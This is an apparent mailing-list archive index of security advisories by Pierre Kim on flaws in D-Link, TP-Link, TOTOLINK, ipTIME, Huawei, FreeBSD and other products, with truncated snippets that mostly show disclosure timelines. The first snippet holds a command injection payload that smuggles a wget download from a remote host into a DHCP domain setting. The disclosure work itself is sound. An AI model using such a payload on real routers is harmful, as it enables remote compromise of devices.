Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol

2017-09-08 Thread Pierre Kim
:1/dhcps4/pool/end 192.168.0.199 xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800 xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1 xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24 xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ;

Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in GoAhead

2017-03-08 Thread Pierre Kim
Hello, Please find a text-only version below sent to security mailing lists. The complete version on analysing the security of "Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in GoAhead" is posted here: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html ===

TP-Link C2 and C20i vulnerable to command injection (authenticated root RCE), DoS, improper firewall rules

2017-02-13 Thread Pierre Kim
als. ## Report Timeline * Sep 17, 2016: Vulnerabilities found by Pierre Kim. * Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link replies there is no process to handle security problems in TP-Link routers and refuses to indicate a security point of contact. * Dec 27, 2016: TP-Link

Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)

2016-09-28 Thread Pierre Kim
estions should contact their local/regional D-Link support offices for the latest information. ## Report Timeline * Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers. * Apr 04, 2016: A public advisory about Quanta routers is sent to security mailing lists. * Jun 09, 2016: Pierre

FreeBSD bsnmpd information disclosure

2016-01-14 Thread Pierre Kim
e permissions for existing installations. This vulnerability can be fixed by modifying the permission on /etc/bsnmpd.conf to owner root:wheel and permission 0600. ## Report Timeline * Nov 04, 2015: Vulnerability found by Pierre Kim. * Nov 05, 2015: security-offi...@freebsd.org is notified of the vulne

CVE-2015-7944, CVE-2015-7945 - Ganeti Security Advisory (DoS, Unauthenticated Info Leak)

2016-01-04 Thread Pierre Kim
RAPI daemon without authentication. I wrote a tool, "GHETTO-BLASTER", to industrialize the process: user@kali:~$ ./GHETTO-BLASTER http:// Example: https:// 2015 Pierre Kim <pierre.kim@gmail.com> @PierreKimSec https://pierrekim.github.io DO WHAT THE FUCK YOU W

Huawei Wimax routers vulnerable to multiple threats

2015-11-30 Thread Pierre Kim
rs are in the End Of Service cycle and will not be supported anymore. The vendor encourages its clients to discard existing unsupported models and to use new routers. ## Report Timeline * Jul 01, 2015: Vulnerabilities found by Pierre Kim. * Oct 28, 2015: Huawei PSIRT is notified of the vulnerab

OpenBSD package 'net-snmp' information disclosure

2015-11-13 Thread Pierre Kim
. ## Report Timeline * Nov 04, 2015: Vulnerability found by Pierre Kim. * Nov 06, 2015: Stuart Henderson is notified of the vulnerability. * Nov 06, 2015: Stuart Henderson confirms the vulnerability and fixes the package permissions for the sample configuration file in -current and -stable. * Nov

A comprehensive study of Huawei 3G routers - XSS, CSRF, DoS, unauthenticated firmware update, RCE

2015-10-07 Thread Pierre Kim
U B970, WLA1GAPU B932, WLB1TIPU B933, WLB1TIPU B220, WLA1GCYU B260, WLA1GCYU B270, WLA1GCYU B972, WLA1GCYU B200-20, WLB3TILU B200-30, WLB3TILU B200-40, WLB3TILU B200-50, WLB3TILU ??, WLA1GCPU ## Vendor Response The vulnerable routers are in the End Of Service cycle and will not be

Update: Backdoor and RCE found in 8 TOTOLINK router models

2015-08-13 Thread Pierre Kim
, -- Pierre Kim pierre.kim@gmail.com @PierreKimSec https://pierrekim.github.io/

Backdoor and RCE found in 8 TOTOLINK router models

2015-07-16 Thread Pierre Kim
vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x02.txt https://pierrekim.github.io/blog/2015-07-16

4 TOTOLINK router models vulnerable to CSRF and XSS attacks

2015-07-15 Thread Pierre Kim
. ## Report Timeline * Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices. * Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs. * Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking for similar ipTIME products. * Jul 16, 2015: A public advisory is sent to security

15 TOTOLINK router models vulnerable to multiple RCEs

2015-07-15 Thread Pierre Kim
to un-ethical code found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted with regard to this case, but ipTIME was contacted in April 2015 concerning the first RCE. ## Report Timeline * Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres

Backdoor credentials found in 4 TOTOLINK router models

2015-07-15 Thread Pierre Kim
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares. * Jun 26, 2015: working PoCs. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These backdoor credentials were found by Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories

ipTIME n104r3 vulnerable to CSRF and XSS attacks

2015-07-06 Thread Pierre Kim
to be useless. They don't publish security information in the changelog, they don't answer security researchers and they don't credit them either. EFMNetworks ipTIME was not contacted with regard to this case. ## Report Timeline * Apr 20, 2015: Vulnerabilities found by Pierre Kim. * Jun 20

127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request

2015-07-06 Thread Pierre Kim
researchers and they don't credit them either. EFMNetworks ipTIME was not contacted with regard to this case. ## Report Timeline * Jun 02, 2014: Vulnerability found by Pierre Kim. * Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs. * Jun 25, 2015: Vulnerability confirmed on all

112 ipTIME Routers/WiFi APs/Modems/Firewalls models vulnerable with RCE with root privileges

2015-04-17 Thread Pierre Kim
Response The vendor has released a new firmware version (9.58) for 112 devices: http://iptime.com/iptime/?uid=16202&mod=document&page_id=16 ## Report Timeline * Jun 01, 2014: Vulnerability found by Pierre Kim and Alexandre Torres. * Mar 24, 2015: Vulnerability confirmed on all the existing

FreeBSD 10.x ZFS encryption.key disclosure (CVE-2015-1415)

2015-04-08 Thread Pierre Kim
, 10.1-STABLE - releng/10.1, 10.1-RELEASE-p8 - releng/10.0, 10.0-RELEASE-p18 ## Report Timeline * Mar 01, 2015: Problem found by Pierre Kim * Apr 01, 2015: Vendor is notified of the vulnerability * Apr 01, 2015: Vendor confirms report and indicates a fix is prepared